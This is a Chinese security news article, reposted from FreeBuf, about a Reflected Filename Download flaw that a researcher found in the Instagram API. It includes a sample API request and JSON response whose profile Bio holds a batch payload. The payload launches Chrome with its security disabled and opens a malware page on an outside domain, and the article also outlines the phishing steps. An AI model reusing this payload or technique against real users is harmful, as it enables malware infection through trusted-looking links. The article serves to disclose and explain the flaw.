安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。
这个RFD(反射型文件名下载)漏洞存在 于 Instagram API 中。 通过篡改任何用户账号的访问令牌并使用一些技巧,攻击者可以创建一个恶意文件下载链接。同时由于这个链接指向Instagram域名上的合法资源,所以很难被用户觉察。
“我在Instagram API上发现了一个RFD(反射型文件名下载),不需要向URL上添加任何指令,因为我们可以使用一个持久型反射域来实现它,例如用户账号上的“Bio”域。 那么,我们需要什么呢?仅仅需要一个令牌。不过不用担心,我们只需注册一个新的账号就能得到一个令牌。下一步,插入我们想在用户账号的“Bio”域(或其他域)中使用的批处理指令。接着,我将尝试用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用该浏览器中的大多数保护机制。”
为了构建“反射型部分”,Sopas在用户账号的“Bio”域中插入了一个批处理指令,并解释说插入到其他域也可以实现同样的功能。然后,他用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用浏览器中的大多数保护机制。
通过分析了用户的Instagram JSON文件,然后通过修改JSON文件来实现“文件名部分”:
https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a {“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”/”||start chrome websegura.net//malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:////websegura.net”,”profile_picture”:”https:////igcdn-photos-f-a.akamaihd.net//hphotos-ak-xaf1//t51.2885-19//11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}
由于“文件名部分”的限制,这种附加方法只能在特定的浏览器中正常工作,这些浏览器包括Chrome、Opera、Chrome安卓版、安卓stock浏览器和火狐浏览器。
在他的攻击中,Sopas使用了一个特定的文件名,他创建的完整链接可以被发送到受害者的Instagram消息中。
1、恶意用户向他所有的Instagram好友发送一条消息,其中包含一个指向恶意页面的链接。 2、受害者点击链接,检查并发现该文件存储在Instagram服务器,下载并运行它。 3、受害者感染恶意软件。
[参考来源 securityaffairs ,有适当修改,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]